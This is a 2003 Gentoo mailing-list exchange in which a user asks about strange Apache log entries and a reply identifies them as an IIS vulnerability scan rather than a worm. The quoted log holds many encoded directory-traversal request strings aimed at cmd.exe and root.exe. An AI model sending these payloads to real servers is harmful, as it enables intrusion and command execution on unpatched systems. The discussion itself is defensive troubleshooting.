This is no worm, but some kiddy is using a simple security tool to check if he finds old IIS servers that aren't patched against those redirect and unicode vulnerabilities. Lots of kids out ther that use these tools :-)
If it is a worm, then you usually have only one or two strange lines in there, but here you have the typical check for several vulnerabilities. ----- Original Message ----- From: "Aaron Walker" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wednesday, December 31, 2003 11:18 AM Subject: [gentoo-user] trying to be hacked? > A week or so ago, I setup my cable router/firewall to forward port 80 to > one of my machines so I could run Apache. Last night while at work, I > checked to see if it worked, and it did. So just now, I went to check > out the access_log and noticed some funny looking stuff, that doesnt > look like normal activity.... > > <snipped from /var/log/apache2/access_log> > > 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET > /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 321 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 321 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir > HTTP/1.0" 404 337 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 > "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get > /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi nnt/system32/cmd.exe?/c%20dir" > 501 336 "-" "-" > > is this someone trying to exploit apache? > > Thanks, > Aaron > -- > /usr/bin/fortune says: > A woman did what a woman had to, the best way she knew how. > To do more was impossible, to do less, unthinkable. > -- Dirisha, "The Man Who Never Missed" > > > -- > [EMAIL PROTECTED] mailing list > > -- [EMAIL PROTECTED] mailing list
